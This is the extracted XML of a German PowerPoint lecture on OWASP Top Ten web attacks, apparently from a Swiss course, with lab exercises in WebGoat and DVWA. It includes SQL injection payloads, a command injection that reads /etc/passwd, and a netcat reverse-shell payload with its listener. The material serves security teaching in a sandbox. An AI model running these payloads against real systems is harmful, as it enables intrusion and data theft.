                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB97E2A-EAFC-4C05-A9E8-8D633891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9" y="1815960"/>
            <a:ext cx="5685453" cy="37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A5A5A5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5B27B77-9346-4F17-85B9-C76CA10E3A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="942000" y="920064"/>
            <a:ext cx="11250000" cy="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2E449B-9A48-482D-AEEE-E73896E1A402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16601" y="0"/>
            <a:ext cx="0" cy="686520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2B8D765-6CFF-4551-B091-13F2626B7A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249715" y="124662"/>
            <a:ext cx="104819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Block 10 vom 5.3.2022</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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2AB8E98-FE52-4FD5-B055-C5E5A01D09E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1453101" y="1734174"/>
            <a:ext cx="4024956" cy="4024956"/>
            <a:chOff x="5900049" y="2060165"/>
            <a:chExt cx="4024956" cy="40249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F4C921-D825-489B-B005-1327C192B5CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5900049" y="2060165"/>
              <a:ext cx="4024956" cy="4024956"/>
              <a:chOff x="5900049" y="2060165"/>
              <a:chExt cx="4024956" cy="4024956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000696F-EFE0-4909-8CAC-942F5E39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049" y="2060165"/>
                <a:ext cx="4024956" cy="4024956"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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7FA6A04-ACCC-4560-9A22-7EDFD6243ED4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7227142" y="3313470"/>
                <a:ext cx="1351106" cy="14595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3D86191-68B4-45CB-89C6-7C40E72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738" y="3755234"/>
              <a:ext cx="134160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A03:2021-Injection [1]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0" y="1585529"/>
            <a:ext cx="101922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SQL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Injection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Klassiker (Login Bypass)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Users WHERE Username='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AND Password='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enthält Wert aus der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Loginmaske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secret</a:t>
            </a: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enthält Wert aus der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Loginmaske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admin</a:t>
            </a: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Diese Query wird nur eine Zeile zurückgeben, wenn Username und Passwort korrekt sind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Users WHERE Username='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admin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AND Password='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secret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marL="4476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Wenn jetzt in der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Loginmaske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stattdessen das hier eingegeben wird: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enthält nun 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1'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'1' = '1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enthält nun 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1'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'1' = '1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Ergibt sich untenstehende Query und der Benutzer kann sich anmelden, ohne das Passwort zu wissen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Users WHERE Username='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1' OR '1' = '1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AND Password='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1' OR '1' = '1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5006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https://owasp.org/Top10/A03_2021-Injection/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0"/>
              <a:t> [2] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://xkcd.com/327/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0"/>
              <a:t>  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6B7F605-E757-459E-9F0B-50C539BD5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15" y="4589040"/>
            <a:ext cx="6047539" cy="186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6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A03:2021-Injection [1]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0" y="1585529"/>
            <a:ext cx="10192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WebGoat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A1 Injection, SQL Injection (intro)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Steps 1, 2, 6-10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machen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1362075" lvl="2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Basics,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basierend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SELECT Statements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anderen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Steps 3-5, 11-13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Wenn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fertig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Hausaufgabe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1362075" lvl="2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Komplexer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komplexere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SELECT Statements,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aber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UPDATE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Path Traversal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Ausnutzen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Fehler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Mappen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Pfades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in der URL auf das File-System auf dem Server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Heikel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.. für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Verzeichnis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nach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oben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Pfad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oder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auch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“File Inclusion”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Damit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Daten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Server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extrahieren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!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330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https://owasp.org/Top10/A03_2021-Injection/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56291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DVWA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0" y="1585529"/>
            <a:ext cx="1019223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DVWA: Damn Vulnerable Web Application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hlinkClick r:id="rId4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https://github.com/digininja/DVWA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VM: In das Verzeichnis Block10/DVWA gehen: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In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einer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2.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Konsole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bitte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folgendes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eingeben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exec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dvwa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sed -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's/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allow_url_include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Off/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allow_url_include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On/g' /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/php/7.0/apache2/php.ini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exec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dvwa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/apache2 reload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Zugriff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der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http://localhost:7070/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Username: admin, Password: password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Optional: Vom Host aus: Mit Host-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Only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Netzwerk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6"/>
              </a:rPr>
              <a:t>http://cybercops-ip:7070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(mit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ifconfig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-a IP-Adresse herausfinden)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330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7"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/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11244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A03:2021-Injection [1]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69" y="1585529"/>
            <a:ext cx="654526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DVWA: File Inclusion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Wieder die Web Developer Toolbar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nützen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Links auf der DVWA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Seite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beachten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Remote Code Execution (RCE)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Königsdisziplin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”,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weil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ich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damit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meinen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eigenen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Code auf dem Server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ausführen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kann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Repo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mit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vielen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verschiedenen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Reverse Shells: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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md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Mit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Hilfe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von Command Injection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kann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eine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Reverse Shell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gestartet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werden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330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5"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A03_2021-Injection/</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200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34ABCA-92CF-4303-B8AD-129963D4AB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r="12585"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060247" y="3463454"/>
            <a:ext cx="3767159" cy="27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7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A03:2021-Injection [1] (Übung RCE)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69" y="1585529"/>
            <a:ext cx="98601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DVWA: Command Injection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127.0.0.1; cat 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/passwd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gibt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Liste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aller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User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Vorbereiten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DVWA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In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CyberOPs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VM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exec -it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dvwa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     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Öffnet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Shell in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dvwa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Docker Container)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In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dieser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Shell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 install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netcat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ausführen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dann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exit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Situation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dvwa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Container /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Webapplikation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ist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“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innen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”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nur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mit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docker mgmt.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Befehlen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und Web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erreichbar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Die Shell in der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CyberOPs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VM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stellt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“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aussen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”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dar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kein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auf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dvwa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Container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möglich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330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https://owasp.org/Top10/A03_2021-Injection/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27849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A03:2021-Injection [1] (Übung RCE)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69" y="1585529"/>
            <a:ext cx="98601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Vorbereitung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Seite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Hacker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 Shell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Listener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öffnen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lvp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4711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Damit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hört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dieser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Prozess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jetzt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einkommende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Verbindungen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Angriff (Web-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Applikation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In DVWA: Command Injection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wird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jetzt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per Injection die Reverse Shell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gestartet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Passende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Reverse Shell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suchen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in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PayLoadsAllTheThings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Hier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z.B.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172.16.1.1;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netcat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172.17.0.1 4711 -e /bin/bash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BÄNG!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Was würde ein Angreifer jetzt tun?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330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https://owasp.org/Top10/A03_2021-Injection/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63219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Aufgaben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69" y="1585529"/>
            <a:ext cx="986014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OWASP Top Ten selbstständig und nach Interesse vertiefen.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Dazu steht zur Verfügung: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WebGoat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DVWA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TryHackMe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https://tryhackme.com/room/owasptop10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Google / eigene Quellen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Schaue Dir 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https://archive.org/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 hat die Webseite Deiner Firma vor 10 Jahren ausgesehen? (OSINT)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interessiert Dich sonst?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181759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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACCE Block 11</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3000" b="1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081B6EB-677D-457D-9E69-D8A0DC9A1E13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Angriffe auf Webapplikationen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04572A2-D897-4DE2-8C56-4C81677F4E2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42561EB0-CC3A-4724-A320-1EAB1F1FE3A2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E08E895-80AB-40DD-982A-BB06D06263DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347593" y="2780990"/>
            <a:ext cx="178157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CCEC4B4-A541-484D-9CD8-EB135D9447CC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Angriffsarten auf Webapplikationen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OWASP Top Ten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>
                <a:solidFill>
                  <a:srgbClr val="00B96F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Position 4-6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B96F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="00B96F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>der Rangliste</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B96F"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt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BC52D4-7E5B-4BFE-ACCE-9568039E1CF6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67E91BF9-4DDC-46B4-9F9F-FC62C06117D8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5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0D6FE3B-FA6D-4E84-8D30-4FB8B489F484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6107635" y="2747288"/>
            <a:ext cx="105189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644903-85A6-4D05-AA46-ECE7F98C4286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Einfache Angriffe auf Webapplikationen selber durchführen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AD92FF-2A95-4189-825F-35A4C42251A4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6DABE13-68F5-475E-AE60-5F9F31EF12CF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200367A-8889-4CC1-A810-4690E5253883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9481620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25" name="Grafik 24" descr="Buddha-Silhouette">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F92DFF5F-F6E8-46FD-8F17-5FD5D073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135" y="1734186"/>
            <a:ext cx="774792" cy="774792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Grafik 26" descr="gezeichnete Figur">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFF16E1-473B-40DE-913C-D4EEE73A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8015" y="1763226"/>
            <a:ext cx="761747" cy="76174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6BBC20-E52F-40B8-9EB7-72EE5BDD1561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5978282" y="1802021"/>
            <a:ext cx="7745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600">
                <a:solidFill>
                  <a:srgbClr val="00B96F"/>
                </a:solidFill>
                <a:sym typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4600">
              <a:solidFill>
                <a:srgbClr val="00B96F"/>
              </a:solidFill>
              <a:latin typeface="Lato Light" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Grafik 23" descr="Präsentation mit Organigramm">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263BCDAC-2599-40C2-8F34-4A9BCD260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0482" y="1749106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1AD115-BE01-4D3E-9AD7-BFF36774467F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EC8CED6-016E-44F4-9B3F-112712A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EFB9B3E-547F-4588-9324-6DB68315F60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4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ACHTUNG Aufnahme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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Aufnahme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8A1507C-AF08-4D3B-9127-6BE2975D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0" t="43033" r="7501" b="54937"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536571" y="2754341"/>
            <a:ext cx="3848810" cy="57646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4AACE6-F439-41A6-82B7-83E142F7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71" y="4867261"/>
            <a:ext cx="3848810" cy="103997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783D4-43C3-44E8-B6A7-F35A98CDA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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512540" y="2754341"/>
            <a:ext cx="3958743" cy="315289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DF1E7A-0A49-4C17-9497-6C8179E5EC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512540" y="1610833"/>
            <a:ext cx="9872841" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill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«Guten Abend, ich starte jetzt die Aufzeichnung …»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1753AB-1B53-459A-9858-F154B590012D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3158025" y="3882381"/>
            <a:ext cx="995362" cy="369332"/>
            <a:chOff x="317941" y="6215781"/>
            <a:chExt cx="995362" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Grafik 35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8BAF5E54-27E9-4533-963C-D6123A8F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061DFED-8E5B-4801-9B5F-63136AF47E9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6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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lerninhalt</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3500" b="1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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lernziele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3E245FA-AC17-42D2-A5A9-918C8592A983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="1919445"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1889621" y="3565761"/>
            <a:chExt cx="9464179" cy="369332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B1B2055-9C3B-4077-8F8D-09765844FFAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2345056" y="3565761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kannst selbst einfachste Tests zur Sicherheit von Webapplikationen durchführen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0C144EF-5433-4D1F-AD53-BFEEB62C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9621" y="3665244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80C67E-6C0C-4224-AAC3-3790B8979DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="2633994"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1753885" y="4057974"/>
            <a:chExt cx="9464179" cy="369332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2341FE7-DEF2-45D2-89AF-8B1174B1E0A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kennst die wichtigsten Angriffsarten auf Webapplikationen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676911A-B707-409B-9B65-7D4AF24C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24B2326-08D2-4C31-A362-7629D46D5228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="3362843"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1753885" y="4057974"/>
            <a:chExt cx="9464179" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr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B8C5A14-BD46-45B5-A59D-A1A73072E10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weisst, wie man mit einfachen Mittel im Browser einfache Tests machen kann</a:t>
              </a:r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46F6F103-A2CD-46A3-A20B-C3E7632F9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C6C728-1A2B-4277-B1C0-7F36BD031E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1753885" y="4244491"/>
            <a:ext cx="9464179" cy="369332"/>
            <a:chOff x="1753885" y="4057974"/>
            <a:chExt cx="9464179" cy="369332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8DCDAE6-5998-4C16-A04C-B473D829FC06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weisst, wie man die Sicherheit von Webapplikationen beurteilen kann</a:t>
              </a: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8B0F4EB9-4183-4044-921F-6E2E3D87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8690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0" y="1585529"/>
            <a:ext cx="104880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OWASP: Open Web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Application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Security Project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https://owasp.org/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Tools, Networking, Training …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https://www.meetup.com/de-DE/OWASPSwitzerland/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Wichtiges Projekt: Top Ten: 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6"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/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6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="3009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7"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="12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24D8230-C2D9-4D1D-8148-8D29D68AB0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48" y="3664271"/>
            <a:ext cx="9081609" cy="2503264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608213-9D77-448C-B2A9-685EB84D14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859" y="1645293"/>
            <a:ext cx="3048006" cy="106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3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WebGoat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0" y="1585529"/>
            <a:ext cx="1048800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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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8: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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deliberately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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Application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”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Basiert noch auf OWASP:2017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https://github.com/WebGoat/WebGoat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wer mehr wissen will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VM: In das Verzeichnis Block10/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WebGoat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gehen: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Zugriff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der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VM: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http://localhost:7080/WebGoat/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Vom Host aus: Mit NAT nicht möglich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Vom Host aus: Mit Host-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Only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Netzwerk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6"/>
              </a:rPr>
              <a:t>http://cybercops-ip:7080/WebGoat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(mit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ifconfig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-a IP-Adresse herausfinden)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6676C-197F-4E99-8E61-EA4F50203B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="3009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7"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/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027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A01:2021-Broken Access Control [1]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1" y="1585529"/>
            <a:ext cx="98433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Zugriff auf Systeme / Daten zu denen man nicht berechtigt ist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Grosser Bereich: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Fehlerhafte Verarbeitung von Pfad Angaben in den URL (Objekt-Referenzen)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Fehlerhafte Verarbeitung von eingebetteten Dateien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Fehlerhafte Berechtigungen an sich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IAM  Kommt später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Webgoat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A05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Broken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Access Control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Übung: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Insecure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Direct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Object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References (IDOR)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Diese Übung machen wir zusammen, weil ich noch ein paar Browser Tricks zeigen will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4232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https://owasp.org/Top10/A01_2021-Broken_Access_Control/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7010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A02:2021-Cryptographic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]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1" y="1585529"/>
            <a:ext cx="9843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Fehlerhafte oder fehlende Anwendung von Kryptographie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Mögliche Fehler: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Verwendung alter / unsicherer TLS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Cipher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Suites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Zertifikatshandling (Zertifikat wird nicht geprüft)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Verwendung unsicherer Methoden (z.B. MD5) zur Speicherung von Passwörter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Falsch verwendete kryptographische Methoden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Fehler bei der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krypografischen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Abgesicherung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von Tokens (SAML, JWT)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Webgoat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A03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Insecure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Data Handling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Übung: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Insecure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Login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… und, findest Du Usernamen / Passworten mit den vorhin gelernten Methoden?</a:t>
            </a:r>
          </a:p>
          <a:p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418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https://owasp.org/Top10/A02_2021-Cryptographic_Failures/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103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A02:2021-Cryptographic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]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1" y="1585529"/>
            <a:ext cx="483139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TLS Sicherheit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Zertifikate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Cipher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Suites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Key Exchange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https://www.ssllabs.com/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Domain Deiner Wahl analysieren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Sichten des Resultats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Sind Dir Begriffe daraus schon mal begegnet?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ACHTUNG: Mehr Details in KOMT und später in ACCE (Kryptographie)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418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5"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A02_2021-Cryptographic_Failures/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200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F18F1D-CB6C-403B-B7C4-BE34459FFA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3865" b="4408"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789935" y="1496025"/>
            <a:ext cx="4507330" cy="48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A03:2021-Injection [1]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Host Intrusion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4332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Ausnützen einer Sicherheitslücke um eigenen Code auf einem Client / Server ausführen zu können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Passiert wenn Daten von aussen nicht geprüft / gefiltert werden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SQL / LDAP / Command (Shell-Scripts,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Powershell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SQL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Injection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Klassiker (Daten extrahieren)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Query aus einer PHP Applikation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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artikelNr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bezeichnung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3"/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Artikel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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farbe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farbe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farbe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enthält Wert aus der Suchmaske: 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rot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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artikelNr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bezeichnung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3"/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Artikel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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farbe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rot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farbe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enthält nun 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SELECT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FROM Users--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Bekommt man stattdessen die gesamte Liste aller User mit Passwörter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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artikelNr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bezeichnung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3"/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Artikel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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farbe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 UNION SELECT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FROM Users--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E347AC-2AAB-4A89-908A-B1E594BE284A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245807" y="6535057"/>
            <a:ext cx="3341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https://owasp.org/Top10/A03_2021-Injection/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0152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1B7C4167-B467-4B53-8756-ADE920662AEA}" vid="{F2889E94-8289-4930-9608-BDE2EC83CD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31B3248DBCC44BC6C7EB355FC59B1" ma:contentTypeVersion="13" ma:contentTypeDescription="Ein neues Dokument erstellen." ma:contentTypeScope="" ma:versionID="b6ac7c184955d30223ed822961971ea8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="4b828ac8-0d1f-49fc-88d2-9381040e6d15" xmlns:ns3="20a6b1da-8333-4eed-aa9d-b411e1d87939" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="d0e4cc44773019f6c616094f2954245c" ns2:_="" ns3:_="">
    <xsd:import namespace="4b828ac8-0d1f-49fc-88d2-9381040e6d15"/>
    <xsd:import namespace="20a6b1da-8333-4eed-aa9d-b411e1d87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28ac8-0d1f-49fc-88d2-9381040e6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6b1da-8333-4eed-aa9d-b411e1d87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905352-1AE8-4642-AC31-805003B3A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28ac8-0d1f-49fc-88d2-9381040e6d15"/>
    <ds:schemaRef ds:uri="20a6b1da-8333-4eed-aa9d-b411e1d87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06114E-5342-4E32-BFED-FE75528B6EA4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de36c714-6c13-4f14-b1bf-3ae7f4de6f7c"/>
    <ds:schemaRef ds:uri="acdeab17-90d6-4afc-85a1-e9e0a724df5a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C2287D1-F495-476B-8FB3-69BD6792CD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 Lernvideo_20180427</Template>
  <TotalTime>0</TotalTime>
  <Words>1510</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>247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Lato Light</vt:lpstr>
      <vt:lpstr>Webdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>Fachkürzel - Fach ausgeschrieben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dorotea.boehm@lernen.siw.swiss</dc:creator>
  <cp:lastModifiedBy>Dominik Kuhn</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <cp:lastPrinted>2020-06-05T15:25:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-30T12:10:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-04T21:17:36Z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0x0101003CE31B3248DBCC44BC6C7EB355FC59B1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="AuthorIds_UIVersion_1024">
    <vt:lpwstr>6</vt:lpwstr>
  </property>
</Properties>
</file>